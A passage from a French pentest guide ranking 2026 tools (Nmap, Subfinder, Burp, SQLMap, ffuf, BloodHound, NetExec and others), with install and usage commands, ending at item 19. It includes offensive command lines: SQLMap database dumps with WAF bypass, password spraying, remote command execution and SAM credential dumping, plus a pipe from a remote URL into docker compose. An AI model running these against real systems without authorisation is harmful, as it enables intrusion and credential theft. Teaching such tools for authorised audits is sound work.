Boîte à Outils Pentest 2026 : 50 Outils Essentiels Classés

Introduction : Pourquoi 50 outils ?

Le métier de pentesteur exige une maîtrise d'un large éventail d'outils spécialisés. Contrairement à l'image populaire du hacker utilisant un seul programme magique, un test d'intrusion professionnel mobilise des dizaines d'outils différents selon la phase de l'audit, le type de cible et les objectifs du client. En 2026, l'écosystème s'est considérablement enrichi avec l'arrivée de nouveaux frameworks C2, de scanners basés sur l'intelligence artificielle et d'outils spécifiques au cloud.

Notre sélection de 50 outils repose sur plusieurs critères : la pertinence opérationnelle en 2026, la maturité du projet, la communauté active, la documentation disponible et notre expérience terrain en tant que consultants en cybersécurité. Chaque outil a été testé dans des conditions réelles d'audit. Pour approfondir le sujet de la reconnaissance, consultez notre guide OSINT 2026.

Phase 1 : Reconnaissance — 8 outils essentiels

La phase de reconnaissance est la première étape de tout test d'intrusion. Elle consiste à collecter un maximum d'informations sur la cible avant toute interaction directe. Cette phase se divise en reconnaissance passive (sans interaction avec la cible) et reconnaissance active (scanning direct). Les outils présentés ci-dessous couvrent les deux approches et constituent la base de toute méthodologie de pentest professionnelle. La qualité de la reconnaissance détermine souvent le succès de l'ensemble de l'audit : plus la surface d'attaque est bien cartographiée, plus les vecteurs d'exploitation seront nombreux et pertinents.

1. Nmap — Scanner de ports et de services réseau

Nmap (Network Mapper) est sans conteste le scanner de ports le plus utilisé au monde. Développé depuis 1997 par Gordon Lyon, il reste en 2026 un outil incontournable pour la découverte de services réseau, la détection de systèmes d'exploitation et l'exécution de scripts d'audit automatisés via le Nmap Scripting Engine (NSE). Sa polyvalence et sa fiabilité en font le premier outil à maîtriser pour tout pentesteur. Nmap offre une couverture complète du scanning réseau, depuis le simple balayage de ports TCP jusqu'à l'analyse approfondie avec détection de version et scripts de vulnérabilité.

• Scan TCP/UDP — Découverte complète des ports ouverts avec identification précise des services
• Détection d'OS — Fingerprinting du système d'exploitation par analyse des paquets réseau
• Scripts NSE — Plus de 600 scripts pour la détection de vulnérabilités, le brute-force et l'énumération
• Output multi-format — Export XML, JSON, grepable pour intégration dans les pipelines d'automatisation
• Performance — Scanning parallèle avec contrôle granulaire de la vitesse et de l'agressivité

# Installation
sudo apt install nmap

# Scan complet avec détection de services et scripts par défaut
nmap -sC -sV -oA scan_target 192.168.1.0/24

# Scan UDP des 1000 ports les plus courants
nmap -sU --top-ports 1000 -oA udp_scan 192.168.1.1

# Scan furtif SYN avec détection d'OS
nmap -sS -O -T4 --open 10.10.10.0/24

# Scan de vulnérabilités avec NSE
nmap --script vuln -p 80,443,8080 target.com

Lien officiel : github.com/nmap/nmap

Notre verdict : Nmap est le couteau suisse du scanning réseau. Indispensable dans toute boîte à outils, il est le premier outil à lancer lors de la phase de reconnaissance active. Sa communauté massive et ses scripts NSE le rendent extensible à l'infini. Aucun pentesteur ne peut s'en passer, quel que soit son niveau d'expérience ou son domaine de spécialisation.

2. Subfinder — Découverte passive de sous-domaines

Subfinder est un outil de découverte de sous-domaines rapide et fiable développé par ProjectDiscovery. Il agrège les résultats de plus de 40 sources passives (Certificate Transparency, APIs DNS, moteurs de recherche) pour établir une liste exhaustive des sous-domaines d'une cible sans aucune interaction directe avec celle-ci. C'est l'un des outils les plus efficaces pour la reconnaissance passive en 2026, et il s'intègre parfaitement dans les pipelines d'automatisation grâce à son output JSON et ses options de filtrage avancées.

• 40+ sources passives — Agrégation de données depuis Censys, Shodan, VirusTotal, SecurityTrails et bien d'autres
• Output JSON — Export structuré pour intégration dans les chaînes de traitement automatisées
• Intégration API — Support des clés API pour maximiser les résultats par source
• Rapidité — Architecture concurrente en Go pour des résultats en quelques secondes

# Installation
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest

# Découverte de sous-domaines simple
subfinder -d example.com -o subdomains.txt

# Avec résolution DNS et output JSON
subfinder -d example.com -nW -oJ -o subs.json

# Avec sources spécifiques
subfinder -d example.com -s censys,shodan,virustotal

Lien officiel : github.com/projectdiscovery/subfinder

Notre verdict : Subfinder est le meilleur outil de découverte passive de sous-domaines en 2026. Sa rapidité, sa fiabilité et sa facilité d'intégration dans les pipelines ProjectDiscovery (subfinder → httpx → nuclei) en font un choix évident. Nous le recommandons systématiquement en première étape de reconnaissance web.

3. Amass — Énumération DNS et cartographie de surface d'attaque

Amass est le projet phare de l'OWASP pour l'énumération DNS et la cartographie de la surface d'attaque. Plus complet que Subfinder, il combine reconnaissance passive et active pour offrir une vue d'ensemble détaillée des actifs Internet d'une organisation. Amass excelle dans la construction de graphes de relations entre domaines, sous-domaines, adresses IP et blocs ASN, ce qui en fait un outil précieux pour les audits de périmètre étendu et les évaluations de surface d'attaque complexes.

• Reconnaissance active/passive — Combinaison de techniques DNS, web scraping et API pour une couverture maximale
• Graphe de relations — Visualisation des liens entre domaines, IP, ASN et organisations
• Intégration OWASP — Projet officiel OWASP avec une communauté active et une documentation riche
• Base de données locale — Stockage des résultats pour analyse ultérieure et comparaison dans le temps

# Installation
go install -v github.com/owasp-amass/amass/v4/...@master

# Énumération passive
amass enum -passive -d example.com -o results.txt

# Énumération active avec brute-force DNS
amass enum -active -brute -d example.com -o active_results.txt

# Visualisation du graphe
amass viz -d3 -d example.com

Lien officiel : github.com/owasp-amass/amass

Notre verdict : Amass est l'outil de référence pour la cartographie de surface d'attaque étendue. Plus lent que Subfinder, il compense par une profondeur d'analyse supérieure et des fonctionnalités de graphe uniques. Idéal pour les audits de périmètre large où chaque actif doit être identifié. À combiner avec Subfinder pour des résultats optimaux.

4. theHarvester — Collecte OSINT multi-sources

theHarvester est un outil de collecte d'informations OSINT qui agrège des emails, sous-domaines, adresses IP et noms d'hôtes depuis de multiples sources publiques. Son approche multi-sources en fait un complément idéal à Subfinder et Amass, particulièrement pour la collecte d'adresses email qui peuvent servir au phishing ciblé ou au password spraying lors des phases ultérieures du test d'intrusion. L'outil supporte plus de 20 sources différentes et produit des rapports structurés pour une analyse rapide.

• Multi-sources — Google, Bing, LinkedIn, Shodan, DNSDumpster, VirusTotal et plus de 20 autres sources
• Export XML/JSON — Rapports structurés pour intégration dans les workflows d'audit
• Intégration Shodan — Corrélation avec les données de scanning Internet de Shodan
• Collecte d'emails — Identification des adresses email associées à un domaine pour le social engineering

# Installation
pip install theHarvester

# Collecte depuis Google, Bing et LinkedIn
theHarvester -d example.com -b google,bing,linkedin

# Export au format XML
theHarvester -d example.com -b all -f report.xml

# Recherche avec Shodan
theHarvester -d example.com -b shodan

Lien officiel : github.com/laramies/theHarvester

Notre verdict : theHarvester reste pertinent en 2026 pour la collecte rapide d'emails et de sous-domaines. Bien que d'autres outils soient plus spécialisés pour certaines tâches, sa polyvalence et sa simplicité d'utilisation en font un bon outil de première passe pour la reconnaissance OSINT.

5. Shodan — Moteur de recherche pour appareils connectés

Shodan est le moteur de recherche le plus connu pour les appareils connectés à Internet. Contrairement à Google qui indexe les pages web, Shodan scanne l'ensemble de l'espace IPv4 et indexe les bannières de services (HTTP, SSH, FTP, SMTP, etc.). Pour le pentesteur, Shodan permet d'identifier rapidement les services exposés d'une cible, de découvrir des vulnérabilités connues et de cartographier l'infrastructure externe sans effectuer de scan actif. Son API puissante et son outil CLI en font un complément indispensable à Nmap pour la reconnaissance passive d'infrastructure.

• API REST — Intégration programmatique complète avec limites de requêtes selon le plan
• Alertes — Notification en temps réel lors de la détection de nouveaux services sur vos IP surveillées
• Recherche par bannière — Filtrage avancé par service, version, pays, organisation et vulnérabilité
• CLI intégré — Outil en ligne de commande pour l'automatisation et le scripting

# Installation
pip install shodan

# Initialiser avec votre clé API
shodan init YOUR_API_KEY

# Recherche de serveurs Apache
shodan search "apache" --fields ip_str,port,org

# Informations sur un hôte spécifique
shodan host 1.2.3.4

# Comptage de résultats
shodan count "product:nginx country:FR"

Lien officiel : shodan.io

Notre verdict : Shodan est un outil de reconnaissance passive indispensable. Son indexation continue de l'Internet permet d'obtenir des informations précieuses sans aucune interaction directe avec la cible. L'abonnement payant est fortement recommandé pour les pentesteurs professionnels qui ont besoin de requêtes illimitées et d'accès aux fonctionnalités avancées.

6. Censys — Cartographie de la surface d'attaque Internet

Censys est une plateforme de cartographie Internet similaire à Shodan mais avec un focus particulier sur les certificats TLS et les scans IPv4 complets. Développé par des chercheurs de l'Université du Michigan, Censys offre une API puissante et une interface de recherche avancée qui permettent d'identifier les actifs Internet d'une organisation, de découvrir des certificats TLS révélant des sous-domaines et de détecter des configurations incorrectes de services exposés. Sa base de données de certificats est particulièrement précieuse pour la reconnaissance passive.

• Scan IPv4 complet — Indexation régulière de l'ensemble de l'espace d'adressage IPv4
• Certificats TLS — Base de données massive de certificats pour la découverte de sous-domaines et d'infrastructure
• API puissante — Requêtes programmatiques avec filtres avancés et pagination
• Search 2.0 — Langage de requête avancé pour des recherches précises

# Installation
pip install censys

# Configuration des credentials
censys config

# Recherche de services HTTP avec un titre spécifique
censys search "services.http.response.html_title: admin"

# Recherche de certificats pour un domaine
censys search "parsed.names: example.com" --index-type certificates

# Voir les détails d'un hôte
censys view 1.2.3.4

Lien officiel : censys.io

Notre verdict : Censys est un complément essentiel à Shodan, particulièrement pour l'analyse des certificats TLS et la découverte d'actifs cachés. Sa base de données de certificats permet souvent de découvrir des sous-domaines que d'autres outils ne trouvent pas. L'accès gratuit est limité mais suffisant pour des audits ponctuels.

7. SpiderFoot — Plateforme OSINT automatisée

SpiderFoot est une plateforme de reconnaissance OSINT automatisée qui intègre plus de 200 modules de collecte de données. Son approche holistique permet de corréler automatiquement les informations collectées depuis de multiples sources pour construire un profil complet de la cible. L'interface web intégrée facilite la visualisation et l'analyse des résultats, tandis que le mode CLI permet l'intégration dans les pipelines d'automatisation. SpiderFoot est particulièrement utile pour les phases initiales de reconnaissance où une vue d'ensemble large est nécessaire avant de se concentrer sur des vecteurs d'attaque spécifiques.

• 200+ modules — Couverture exhaustive des sources OSINT : DNS, réseaux sociaux, fuites de données, darknet
• Interface web — Dashboard intuitif pour la visualisation et l'analyse des corrélations
• Corrélation automatique — Mise en relation automatique des données collectées depuis différentes sources
• Mode passif — Collecte d'informations sans aucune interaction directe avec la cible

# Installation
pip install spiderfoot

# Lancer avec l'interface web
spiderfoot -l 127.0.0.1:5001

# Scan en ligne de commande
spiderfoot -s example.com -t EMAILADDR,IP_ADDRESS

# Scan complet avec tous les modules
spiderfoot -s example.com -t ALL -o output.csv

Lien officiel : github.com/smicallef/spiderfoot

Notre verdict : SpiderFoot est l'outil idéal pour la reconnaissance OSINT automatisée. Ses 200+ modules et sa corrélation automatique permettent de gagner un temps considérable lors de la phase initiale d'un audit. L'interface web est un vrai plus pour la visualisation. Recommandé pour les audits de périmètre large et la due diligence.

8. Recon-ng — Framework de reconnaissance modulaire

Recon-ng est un framework de reconnaissance web modulaire écrit en Python, inspiré de l'architecture de Metasploit. Son système de modules téléchargeables depuis un marketplace intégré permet d'étendre ses capacités selon les besoins de l'audit. Recon-ng se distingue par sa base de données intégrée qui stocke et organise automatiquement les résultats de chaque module, facilitant la corrélation et le reporting. C'est un outil de choix pour les pentesteurs qui préfèrent une approche structurée et reproductible de la reconnaissance.

• Marketplace de modules — Bibliothèque de modules téléchargeables pour différentes sources OSINT
• Base de données intégrée — SQLite pour le stockage structuré des résultats et la corrélation
• Reporting — Export des résultats en HTML, CSV, JSON et autres formats
• Workspaces — Séparation des projets avec des espaces de travail indépendants

# Installation
pip install recon-ng

# Lancer Recon-ng avec un workspace
recon-ng -w workspace_name

# Dans Recon-ng : rechercher des modules
modules search

# Installer un module
marketplace install recon/domains-hosts/hackertarget

# Charger et exécuter un module
modules load recon/domains-hosts/hackertarget
options set SOURCE example.com
run

Lien officiel : github.com/lanmaster53/recon-ng

Notre verdict : Recon-ng est un framework de reconnaissance solide qui convient aux pentesteurs aimant travailler de manière structurée. Son approche modulaire et sa base de données intégrée en font un excellent outil pour les audits nécessitant une traçabilité complète des étapes de reconnaissance. Moins rapide que les outils ProjectDiscovery, il compense par sa profondeur et sa flexibilité.

Tableau comparatif — Reconnaissance

Outil	Licence	Langage	Difficulté	Cas d'usage principal	Note (/5)
Nmap	Open source (GPLv2)	C/Lua	Débutant	Scanning de ports et services	⭐⭐⭐⭐⭐
Subfinder	Open source (MIT)	Go	Débutant	Découverte passive de sous-domaines	⭐⭐⭐⭐⭐
Amass	Open source (Apache 2.0)	Go	Intermédiaire	Cartographie de surface d'attaque	⭐⭐⭐⭐
theHarvester	Open source (GPLv2)	Python	Débutant	Collecte emails et sous-domaines	⭐⭐⭐⭐
Shodan	Freemium	Python (CLI)	Débutant	Recherche d'appareils connectés	⭐⭐⭐⭐⭐
Censys	Freemium	Python (CLI)	Intermédiaire	Analyse de certificats et services	⭐⭐⭐⭐
SpiderFoot	Open source (MIT)	Python	Débutant	OSINT automatisée	⭐⭐⭐⭐
Recon-ng	Open source (GPLv3)	Python	Intermédiaire	Reconnaissance structurée	⭐⭐⭐⭐

Phase 2 : Applications Web — 8 outils essentiels

Le test de sécurité des applications web constitue une part majeure des missions de pentest en 2026. Avec la prolifération des architectures cloud-native, des API REST/GraphQL et des single-page applications, les outils de test web ont dû évoluer pour couvrir des surfaces d'attaque toujours plus complexes. Cette section présente les 8 outils web indispensables pour tout pentesteur, des proxies d'interception aux fuzzers spécialisés. Pour un guide approfondi sur le fuzzing d'API, consultez notre article sécurité API avec Burp et Nuclei.

9. Burp Suite Pro — Plateforme de test web complète

Burp Suite Professional de PortSwigger est la plateforme de test de sécurité web la plus utilisée par les professionnels. Son architecture de proxy d'interception, combinée à un scanner automatisé de vulnérabilités, un répéteur de requêtes et un outil d'intrusion paramétrable, en fait un couteau suisse incontournable pour le test d'applications web. En 2026, Burp Suite continue d'évoluer avec l'intégration de fonctionnalités d'IA pour la détection de vulnérabilités et des extensions communautaires toujours plus puissantes via le BApp Store.

• Proxy d'interception — Capture et modification de toutes les requêtes HTTP/HTTPS entre le navigateur et le serveur
• Scanner automatisé — Détection de XSS, SQLi, SSRF, RCE et dizaines d'autres vulnérabilités web
• Extensions BApp Store — Marketplace de plugins communautaires pour étendre les fonctionnalités
• Repeater/Intruder — Outils de manipulation de requêtes pour le test manuel et le brute-force paramétrique
• Collaborator — Serveur de callback externe pour la détection de vulnérabilités out-of-band (SSRF, XXE, blind XSS)

# Installation : téléchargement depuis portswigger.net
# Licence commerciale requise pour la version Pro (~449 USD/an)

# Lancement
java -jar burpsuite_pro.jar

# Configuration du proxy : 127.0.0.1:8080
# Configurer le navigateur pour utiliser ce proxy
# Importer le certificat CA de Burp pour intercepter HTTPS

Lien officiel : portswigger.net/burp

Notre verdict : Burp Suite Pro reste l'outil numéro 1 pour le test de sécurité web en 2026. L'investissement dans la licence commerciale est largement rentabilisé par le gain de temps en audit. La version Community gratuite est trop limitée pour un usage professionnel mais convient pour l'apprentissage. Les extensions comme ActiveScan++, Autorize et JWT Editor sont des must-have.

10. OWASP ZAP — Proxy de sécurité web open source

OWASP ZAP (Zed Attack Proxy) est l'alternative open source à Burp Suite Pro. Développé sous l'égide de l'OWASP, ZAP offre un ensemble complet de fonctionnalités de test de sécurité web : proxy d'interception, scanner automatisé, spider, fuzzer et API REST pour l'automatisation. Son intégration native dans les pipelines CI/CD via l'API et les images Docker en fait un choix privilégié pour le DevSecOps et les tests de sécurité automatisés. ZAP est entièrement gratuit et bénéficie d'une communauté active qui contribue régulièrement des extensions et des améliorations.

• Scan automatisé — Détection de vulnérabilités web courantes (OWASP Top 10) avec scoring de risque
• API REST — Automatisation complète via API pour intégration CI/CD (Jenkins, GitLab CI, GitHub Actions)
• Scripts — Moteur de scripting multi-langages (Python, JavaScript, Groovy) pour la personnalisation
• HUD — Heads Up Display pour le test interactif directement dans le navigateur

# Installation
sudo snap install zaproxy --classic

# Scan rapide en ligne de commande
zap-cli quick-scan -s xss,sqli http://target.com

# Scan via Docker
docker run -t ghcr.io/zaproxy/zaproxy:stable zap-baseline.py -t http://target.com

# Scan complet avec rapport HTML
zap-cli active-scan http://target.com
zap-cli report -o report.html -f html

Lien officiel : github.com/zaproxy/zaproxy

Notre verdict : OWASP ZAP est le meilleur choix pour les organisations qui ne peuvent pas investir dans Burp Suite Pro ou qui cherchent une solution de test automatisé en CI/CD. Bien que son scanner soit légèrement moins performant que celui de Burp, ZAP compense par sa gratuité, son API REST complète et son intégration DevSecOps native.

11. Nuclei — Scanner de vulnérabilités basé sur des templates

Nuclei de ProjectDiscovery est devenu en quelques années l'un des scanners de vulnérabilités les plus populaires de l'écosystème pentest. Son approche basée sur des templates YAML permet une détection rapide et précise de vulnérabilités connues (CVE), de misconfigurations et d'expositions sensibles. Avec plus de 8000 templates communautaires couvrant l'ensemble du spectre des vulnérabilités web, Nuclei est l'outil idéal pour le scanning de masse et l'intégration dans les pipelines de sécurité automatisés.

• 8000+ templates — Bibliothèque communautaire couvrant CVE, misconfigurations, expositions et technologies
• Rapidité — Architecture concurrente en Go avec support du pipelining HTTP pour un scanning ultra-rapide
• Output JSON — Export structuré pour intégration dans les systèmes de ticketing et les SIEM
• CI/CD — Intégration native dans les pipelines DevSecOps pour le scanning continu

# Installation
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest

# Scan de vulnérabilités critiques et hautes
nuclei -u https://target.com -t cves/ -severity critical,high

# Scan avec tous les templates
nuclei -u https://target.com -t nuclei-templates/

# Scan de masse depuis une liste
cat urls.txt | nuclei -t cves/ -severity critical -o results.txt

# Pipeline complet
subfinder -d target.com | httpx | nuclei -t cves/ -severity critical,high

Lien officiel : github.com/projectdiscovery/nuclei

Notre verdict : Nuclei est l'outil de scanning de vulnérabilités le plus efficace en 2026 pour la détection de vulnérabilités connues à grande échelle. Sa communauté active garantit des templates mis à jour rapidement après la divulgation de nouvelles CVE. Indispensable dans tout pipeline de sécurité automatisé.

12. SQLMap — Exploitation automatisée d'injections SQL

SQLMap est l'outil de référence pour la détection et l'exploitation automatisée des vulnérabilités d'injection SQL. Supportant six techniques d'injection différentes (boolean-based, time-based, UNION-based, error-based, stacked queries et out-of-band), SQLMap peut identifier et exploiter des injections SQL dans pratiquement tous les SGBD : MySQL, PostgreSQL, Oracle, MSSQL, SQLite et bien d'autres. Son automatisation complète permet de passer de la détection à l'extraction de données en quelques commandes, tout en contournant les WAF et les filtres de sécurité.

• Détection automatique — Identification intelligente du type d'injection et du SGBD cible
• 6 techniques d'injection — Boolean, time-based, UNION, error-based, stacked queries, out-of-band
• Extraction de données — Dump complet de bases de données, tables, colonnes et données
• WAF bypass — Techniques d'évasion intégrées avec tamper scripts personnalisables

# Installation
pip install sqlmap

# Test d'injection sur un paramètre GET
sqlmap -u "http://target.com/page?id=1" --dbs --batch

# Test avec cookie d'authentification
sqlmap -u "http://target.com/page?id=1" --cookie="session=abc123" --dbs

# Extraction complète d'une base
sqlmap -u "http://target.com/page?id=1" -D database_name --dump-all

# Bypass de WAF avec tamper scripts
sqlmap -u "http://target.com/page?id=1" --tamper=space2comment,between --random-agent

Lien officiel : github.com/sqlmapproject/sqlmap

Notre verdict : SQLMap reste l'outil incontournable pour l'exploitation d'injections SQL en 2026. Son automatisation et ses capacités de bypass WAF sont impressionnantes. Attention toutefois à ne pas l'utiliser de manière aveugle : une compréhension des injections SQL est nécessaire pour interpréter correctement les résultats et éviter les faux positifs.

13. ffuf — Fuzzer web ultra-rapide

ffuf (Fuzz Faster U Fool) est un fuzzer web écrit en Go, reconnu pour sa vitesse exceptionnelle et sa flexibilité. Il supporte le fuzzing de directories, de paramètres, de virtual hosts et de headers HTTP. Son système de filtrage avancé (par code de réponse, taille, nombre de mots, nombre de lignes) permet d'identifier rapidement les résultats intéressants dans de grands volumes de données. ffuf est devenu le fuzzer web de référence pour les pentesteurs qui apprécient les outils rapides et configurables en ligne de commande.

• Multi-mode — Fuzzing de directories, virtual hosts, paramètres GET/POST et headers
• Filtrage avancé — Filtres par code HTTP, taille de réponse, nombre de mots/lignes, regex
• Output JSON — Export structuré pour post-traitement automatisé
• Rapidité — Architecture concurrente Go avec contrôle de la vitesse de scanning

# Installation
go install github.com/ffuf/ffuf/v2@latest

# Fuzzing de directories
ffuf -w wordlist.txt -u https://target.com/FUZZ -mc 200,301

# Fuzzing de virtual hosts
ffuf -w subdomains.txt -u https://target.com -H "Host: FUZZ.target.com" -fs 4242

# Fuzzing de paramètres POST
ffuf -w params.txt -u https://target.com/api -X POST -d "FUZZ=test" -mc 200

# Mode récursif
ffuf -w wordlist.txt -u https://target.com/FUZZ -recursion -recursion-depth 3

Lien officiel : github.com/ffuf/ffuf

Notre verdict : ffuf est le fuzzer web le plus rapide et le plus polyvalent en 2026. Sa syntaxe avec le mot-clé FUZZ est intuitive, son filtrage est puissant et sa vitesse est imbattable. Il a largement remplacé DirBuster et dirbsearch dans la boîte à outils des pentesteurs professionnels. Recommandé sans réserve.

14. Gobuster — Brute-force de directories et DNS

Gobuster est un outil de brute-force rapide écrit en Go, spécialisé dans la découverte de directories web, de sous-domaines DNS et de virtual hosts. Bien que ffuf soit plus polyvalent, Gobuster reste populaire pour sa simplicité d'utilisation et ses modes spécialisés (dir, dns, vhost, s3, fuzz). Son mode S3 bucket discovery est particulièrement utile pour les audits d'environnements cloud AWS. Gobuster est souvent le premier outil de fuzzing que les débutants apprennent, grâce à sa syntaxe simple et sa documentation claire.

• Modes dir/dns/vhost/s3/fuzz — Multiples modes de brute-force pour différents cas d'usage
• Rapide — Architecture concurrente Go avec contrôle du nombre de threads
• Go natif — Binary unique sans dépendances, facile à déployer
• S3 discovery — Mode spécialisé pour la découverte de buckets S3 publics

# Installation
go install github.com/OJ/gobuster/v3@latest

# Brute-force de directories
gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt

# Brute-force DNS
gobuster dns -d example.com -w subdomains.txt

# Brute-force de virtual hosts
gobuster vhost -u https://target.com -w vhosts.txt

# Découverte de buckets S3
gobuster s3 -w bucket-names.txt

Lien officiel : github.com/OJ/gobuster

Notre verdict : Gobuster est un outil fiable et simple pour le brute-force de directories. Bien que ffuf soit plus polyvalent, Gobuster conserve un avantage pour les débutants grâce à sa syntaxe plus intuitive et ses modes spécialisés. Le mode S3 est un atout unique pour les audits cloud.

15. Wfuzz — Fuzzer d'applications web en Python

Wfuzz est un fuzzer d'applications web écrit en Python, historiquement l'un des premiers outils de fuzzing web. Il offre un système de plugins d'encodage riche, le support de payloads multiples simultanés et un filtrage avancé des réponses. Bien que ffuf et Gobuster soient plus rapides, Wfuzz reste pertinent pour les scénarios complexes nécessitant des encodages spécifiques ou des combinaisons de payloads élaborées que les outils Go ne gèrent pas nativement.

• Plugins d'encodage — Base64, MD5, SHA1, URL encoding et dizaines d'autres encodages chaînables
• Payloads multiples — Support de plusieurs mots-clés FUZZ simultanés (FUZ2Z, FUZ3Z) pour le fuzzing multi-paramètres
• Filtrage par réponse — Filtres par code, taille, mots, lignes et regex sur le contenu
• Extensible — Architecture de plugins pour ajouter des sources de payload et des encodeurs personnalisés

# Installation
pip install wfuzz

# Fuzzing de directories avec filtrage
wfuzz -c -z file,wordlist.txt --hc 404 http://target.com/FUZZ

# Fuzzing avec encodage Base64
wfuzz -c -z file,wordlist.txt,base64 http://target.com/api?token=FUZZ

# Fuzzing multi-paramètres
wfuzz -c -z file,users.txt -z file,passwords.txt --hc 401 http://target.com/login?user=FUZZ&pass=FUZ2Z

Lien officiel : github.com/xmendez/wfuzz

Notre verdict : Wfuzz reste un outil de niche utile pour les scénarios de fuzzing complexes nécessitant des encodages et des payloads multiples. Pour le fuzzing standard de directories et de paramètres, préférez ffuf qui est significativement plus rapide. Wfuzz garde sa place dans la boîte à outils pour les cas d'usage avancés.

16. httpx — Boîte à outils HTTP rapide

httpx de ProjectDiscovery est un outil HTTP multi-usages conçu pour le probing de masse, la détection technologique et l'extraction d'informations depuis des listes d'URLs. Son intégration parfaite dans les pipelines Unix (stdin/stdout) et sa vitesse en font le liant idéal entre les outils de découverte (subfinder) et les scanners de vulnérabilités (nuclei). httpx peut détecter les technologies web, extraire les titres de page, vérifier les codes de réponse et filtrer les hôtes actifs en quelques secondes sur des milliers de cibles.

• Probing HTTP — Vérification rapide de la disponibilité et du statut de milliers d'URLs
• Détection technologique — Identification des technologies web (framework, CMS, serveur) via Wappalyzer
• Output JSON — Export structuré avec métadonnées riches pour chaque URL
• Pipeline friendly — Intégration native stdin/stdout pour les chaînes de traitement Unix

# Installation
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest

# Probing HTTP avec détection technologique
cat subdomains.txt | httpx -status-code -title -tech-detect

# Extraction des titres et screenshots
cat urls.txt | httpx -title -screenshot -o results.json

# Filtrage par code de réponse
cat urls.txt | httpx -mc 200,301,302 -o alive.txt

# Pipeline complet de reconnaissance
subfinder -d target.com -silent | httpx -silent | nuclei -severity critical

Lien officiel : github.com/projectdiscovery/httpx

Notre verdict : httpx est le chaînon manquant dans le pipeline de reconnaissance web. Sa capacité à traiter rapidement des milliers d'URLs avec détection technologique en fait un outil indispensable. Le combo subfinder → httpx → nuclei est devenu le standard de facto pour la reconnaissance web automatisée en 2026.

Tableau comparatif — Applications Web

Outil	Licence	Langage	Difficulté	Cas d'usage principal	Note (/5)
Burp Suite Pro	Commerciale	Java	Intermédiaire	Test de sécurité web complet	⭐⭐⭐⭐⭐
OWASP ZAP	Open source (Apache 2.0)	Java	Débutant	Scan automatisé web / CI/CD	⭐⭐⭐⭐
Nuclei	Open source (MIT)	Go	Débutant	Scanning de CVE à grande échelle	⭐⭐⭐⭐⭐
SQLMap	Open source (GPLv2)	Python	Intermédiaire	Exploitation d'injections SQL	⭐⭐⭐⭐⭐
ffuf	Open source (MIT)	Go	Débutant	Fuzzing web rapide	⭐⭐⭐⭐⭐
Gobuster	Open source (Apache 2.0)	Go	Débutant	Brute-force directories/DNS	⭐⭐⭐⭐
Wfuzz	Open source (GPLv2)	Python	Intermédiaire	Fuzzing avec encodage avancé	⭐⭐⭐
httpx	Open source (MIT)	Go	Débutant	Probing HTTP et pipeline	⭐⭐⭐⭐⭐

Phase 3 : Active Directory — 8 outils essentiels

L'Active Directory (AD) reste en 2026 le cœur de l'authentification et de l'autorisation dans les entreprises. Avec plus de 95 % des organisations du Fortune 1000 utilisant AD, cette technologie constitue une cible prioritaire pour les attaquants et un terrain d'audit critique pour les pentesteurs. Les outils présentés dans cette section couvrent l'ensemble du cycle offensif sur AD : de la cartographie des chemins d'attaque avec BloodHound à l'exploitation des vulnérabilités de certificats avec Certipy. Pour un guide complet sur le pentest Active Directory, consultez notre article dédié.

17. BloodHound CE — Analyse graphique des chemins d'attaque AD

BloodHound Community Edition (CE) est le standard pour la visualisation et l'analyse des chemins d'attaque dans les environnements Active Directory et Azure AD. Développé par SpecterOps, BloodHound utilise une base de données orientée graphe (Neo4j + PostgreSQL) pour transformer les données de l'AD en chemins d'attaque visuels. En 2026, BloodHound CE a complètement remplacé la version Legacy avec une interface web moderne, une API REST complète et un support amélioré des environnements hybrides. L'outil permet d'identifier en quelques clics les chemins d'escalade de privilèges les plus critiques, les comptes sur-privilégiés et les configurations dangereuses.

• Interface web moderne — Dashboard React avec visualisation interactive des graphes d'attaque
• PostgreSQL + Neo4j — Architecture de stockage performante pour les grands environnements AD
• Analyse hybride AD/Azure — Support des environnements on-premises et cloud (Entra ID)
• API REST — Documentation OpenAPI complète pour l'automatisation et l'intégration
• Requêtes Cypher — Langage de requête puissant pour l'analyse personnalisée des chemins d'attaque

# Installation via Docker Compose
curl -L https://ghst.ly/getbhce | docker compose -f - up

# Récupérer le mot de passe admin initial
docker compose logs bloodhound | grep "Initial Password"

# Accéder à l'interface web
# https://localhost:8080/ui/login

# Requête Cypher : trouver le plus court chemin vers Domain Admin
MATCH p=shortestPath((u:User)-[*1..]->(g:Group {name:"DOMAIN ADMINS@DOMAIN.LOCAL"}))
WHERE u.enabled = true
RETURN p

Lien officiel : github.com/SpecterOps/BloodHound

Notre verdict : BloodHound CE est absolument indispensable pour tout audit Active Directory. Sa capacité à visualiser les chemins d'attaque complexes en quelques secondes est inégalée. Migrez vers la version CE si vous utilisez encore la version Legacy. L'investissement en temps d'apprentissage du langage Cypher est largement rentabilisé par la qualité des résultats obtenus.

18. CrackMapExec / NetExec — Post-exploitation réseau polyvalente

NetExec (successeur de CrackMapExec) est un outil de post-exploitation réseau polyvalent qui permet d'interagir avec de multiples protocoles Windows (SMB, LDAP, WinRM, MSSQL, RDP) pour l'énumération, le spray de credentials, l'exécution de commandes et l'extraction de données. C'est le couteau suisse de la post-exploitation en environnement Windows, permettant de tester rapidement des credentials sur des centaines de machines simultanément et d'identifier les accès privilégiés dans un domaine AD.

• Multi-protocoles — SMB, LDAP, WinRM, MSSQL, RDP, SSH, FTP pour une couverture complète
• Spray de credentials — Test de mots de passe sur de multiples cibles avec gestion intelligente du verrouillage
• Exécution de commandes — Exécution distante via SMB (smbexec), WMI, WinRM ou MSSQL
• Modules d'extraction — Dump de SAM, LSA, NTDS.dit, extraction de credentials en mémoire

# Installation
pipx install git+https://github.com/Pennyw0rd/NetExec

# Énumération des partages SMB
nxc smb 192.168.1.0/24 -u user -p password --shares

# Password spraying
nxc smb 192.168.1.0/24 -u users.txt -p 'Password123!' --continue-on-success

# Exécution de commandes via WinRM
nxc winrm 192.168.1.10 -u admin -p password -x "whoami /all"

# Dump de SAM
nxc smb 192.168.1.10 -u admin -p password --sam

Lien officiel : github.com/Pennyw0rd/NetExec

Notre verdict : NetExec est l'outil de post-exploitation réseau le plus complet pour les environnements Windows. Sa capacité à tester des credentials sur des centaines de machines en quelques secondes et à extraire des données depuis de multiples protocoles en fait un incontournable du pentest AD. La transition de CrackMapExec vers NetExec s'est faite en douceur et le projet est activement maintenu.

19. Impacket — Collection de classes Python pour protocoles réseau

